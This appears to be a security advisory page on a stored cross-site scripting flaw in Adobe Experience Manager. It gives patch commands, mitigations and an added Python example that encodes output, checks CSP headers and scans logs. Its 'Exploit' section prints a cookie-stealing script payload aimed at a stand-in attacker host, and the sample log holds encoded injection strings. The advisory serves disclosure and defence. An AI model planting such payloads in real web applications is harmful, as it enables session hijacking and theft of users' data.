Adobe Experience Manager, Stored Cross-Site Scripting (XSS), CVE-2026-47975 (MEDIUM) -DC-Jun2026-330


CVE-2026-47975 is a stored Cross-Site Scripting (XSS) vulnerability affecting Adobe Experience Manager (AEM) versions 6.5.24, LTS SP1, 2026.04, and all earlier releases. The flaw exists in how AEM handles user-supplied input within certain form fields. A low‑privileged attacker (e.g., a user with only content‑authoring rights) can inject malicious JavaScript code into a vulnerable form field. Because the application fails to properly neutralize the input before storing it, the injected script is persisted on the server side. When another user – typically a higher‑privileged user such as an administrator, reviewer, or any other victim – subsequently navigates to the page that contains that field, the malicious script is delivered to the victim’s browser and executed within the context of the AEM application domain. The vulnerability is classified as stored XSS (CWE‑79) because the payload becomes part of the permanent content of the web page.
The attack vector is network‑based, requiring low attack complexity and low privileges. However, user interaction is required: the victim must visit the affected page. The CVSS 3.1 score is 5.4 (Medium) with the vector string AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. The scope is changed, meaning the vulnerability allows the attacker to act outside the original vulnerable component’s boundaries. While the confidentiality and integrity impacts are low, an attacker can still perform actions such as stealing session cookies, performing unauthorised actions on behalf of the victim, or defacing content.
Adobe addressed the issue in the June 2026 security update (APSB26‑56) released on June 9, 2026. Users are advised to upgrade to AEM Cloud Service release 2026.05, AEM 6.5 LTS Service Pack 2, or AEM 6.5 Service Pack 25, depending on their deployment model. No exploits have been observed in the wild, but the existence of a public CVE record means that attackers may construct proof‑of‑concept code.

DailyCVE Form:

Platform: Adobe Experience Manager
Version: 6.5.24 / LTS SP1 / 2026.04 and earlier
Vulnerability: Stored Cross‑Site Scripting
Severity: MEDIUM (CVSS 5.4)
Date: June 9, 2026

Prediction: Patch expected June 9, 2026

What Undercode Say:

Use the following bash commands to check your AEM version and apply the recommended patch:

# Check current AEM version (from the CRX package manager)
curl -u admin:admin 'http://localhost:4502/crx/packmgr/service.jsp?cmd=getVersion'
# Alternatively, inspect the release.properties file inside the AEM installation
grep "currentVersion" /opt/aem/crx-quickstart/repository/version/release.properties
# Download the official patch package (example for AEM 6.5 SP25)
wget https://experience.adobe.com/downloads/apsb26-56/6.5.25-sp.zip
# Upload the package to the CRX Package Manager and install it in the same call
# (install=true; without it the package is only uploaded, not installed)
curl -u admin:admin -F file=@6.5.25-sp.zip -F install=true http://localhost:4502/crx/packmgr/service.jsp
# Restart the AEM instance after patch installation
systemctl restart aem
# Verify the patch package is present in the package list
curl -u admin:admin 'http://localhost:4502/crx/packmgr/service.jsp?cmd=ls' | grep -i "6.5.25"

Exploit:

A low‑privileged attacker can exploit the vulnerability by injecting a JavaScript payload into a vulnerable form field. For example:

<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>

If the application does not sanitise the input properly, the script will be stored and later executed in the browser of any user who views the affected page. The attacker can then capture session tokens, perform actions on behalf of the victim, or redirect to a malicious site.

Protection:

Upgrade immediately to AEM Cloud Service release 2026.05, AEM 6.5 LTS Service Pack 2, or AEM 6.5 Service Pack 25.
Apply a Web Application Firewall (WAF) with rules that block common XSS payloads (e.g., ModSecurity with the OWASP Core Rule Set).
Enforce strict Content Security Policy (CSP) headers to restrict script execution to trusted sources.
Use output encoding for all user‑supplied data when rendering pages.
Limit low‑privileged users’ access to form fields that may contain dynamic content.
Monitor AEM access logs for suspicious inputs containing HTML tags or JavaScript keywords.
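The output-encoding, CSP and log-monitoring items above are the controls a defender can actually verify. The following is an added example written for this page (it is not code from the DailyCVE post, from Undercode, or from Adobe): it HTML-encodes a stored field value so the post's sample payload is rendered as inert text, checks a Content-Security-Policy header for 'unsafe-inline' in its script sources, and scans constructed access-log lines for requests whose decoded query strings carry HTML tags or JavaScript event handlers. The log lines, the /content/forms/feedback path and the field names are constructed for illustration and are not taken from the advisory.

```python
"""
Added example (not from the DailyCVE post or Adobe): three defensive checks for a
stored-XSS finding such as CVE-2026-47975, in plain Python so they run offline.
  1. render_field(): HTML-encode a stored form-field value before it is placed in a
     page, so a persisted <script> payload is displayed as text, not executed.
  2. csp_blocks_inline_scripts(): sanity-check a Content-Security-Policy header value.
  3. scan_access_log(): flag request lines whose decoded target carries HTML tags or
     JavaScript keywords (the access-log monitoring the post recommends).
All data below is constructed; /content/forms/feedback and the parameter names are
hypothetical, not paths from the advisory.
"""
import html
import re
from urllib.parse import unquote_plus


def render_field(stored_value: str) -> str:
    """Encode a stored value for insertion into an HTML text node or quoted attribute."""
    # quote=True also encodes " and ' so the value cannot break out of an attribute.
    return html.escape(stored_value, quote=True)


def csp_blocks_inline_scripts(csp_header: str) -> bool:
    """True if script-src (or the default-src fallback) exists and lacks 'unsafe-inline'."""
    directives = {}
    for part in csp_header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False  # no restriction on script execution at all
    return "'unsafe-inline'" not in sources


# Markers typical of injected markup, matched after URL-decoding the request target.
SUSPICIOUS = re.compile(
    r"<\s*script|javascript\s*:|\bon[a-z]+\s*=|<\s*img|<\s*svg|<\s*iframe",
    re.IGNORECASE,
)

# Constructed, simplified Apache-style access log lines for an AEM author instance.
ACCESS_LOG = """\
10.0.0.5 - author1 [09/Jun/2026:10:01:12 +0000] "POST /content/forms/feedback.html HTTP/1.1" 200 512
10.0.0.5 - author1 [09/Jun/2026:10:02:40 +0000] "GET /content/forms/feedback.html?comment=%3Cscript%3Efetch%28%27https%3A%2F%2Fexample.invalid%2F%3Fc%3D%27%2Bdocument.cookie%29%3C%2Fscript%3E HTTP/1.1" 200 2048
10.0.0.9 - reviewer [09/Jun/2026:10:03:01 +0000] "GET /content/forms/feedback.html?comment=thanks+for+the+update HTTP/1.1" 200 2048
10.0.0.5 - author1 [09/Jun/2026:10:04:15 +0000] "GET /content/forms/feedback.html?title=x%22+onerror%3Dalert%281%29+y%3D%22 HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(log_text: str) -> list:
    """Return (user, ip, decoded target) for each request that looks like an XSS probe."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("target"))  # undo %xx and '+' encoding first
        if SUSPICIOUS.search(decoded):
            hits.append((m.group("user"), m.group("ip"), decoded))
    return hits


if __name__ == "__main__":
    # The post's sample payload, shown encoded rather than executed.
    stored = "<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>"
    print("encoded:", render_field(stored))
    print("CSP ok:", csp_blocks_inline_scripts("default-src 'self'; script-src 'self' https://cdn.example.invalid"))
    for user, ip, target in scan_access_log(ACCESS_LOG):
        print(f"suspicious request from {user}@{ip}: {target}")
```

The encoding step is the one that closes the bug class: once the stored value is escaped on output, the stored `<script>` text reaches the browser as `&lt;script&gt;` and is never parsed as markup. The CSP check and the log scan are compensating controls that help while the patch is being rolled out; a regex scan over decoded query strings will produce some false positives on legitimate content, so treat its hits as triage input rather than as confirmed attacks.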

Impact:

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim’s browser. Potential impacts include:
Session hijacking – stealing authentication cookies and gaining unauthorised access.
Data exfiltration – reading sensitive information displayed on the page.
Phishing – modifying content to trick users into submitting credentials.
Defacement – altering the appearance or content of the AEM web page.
Escalation of privileges – performing actions as the victim user, possibly leading to full compromise of the AEM instance.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
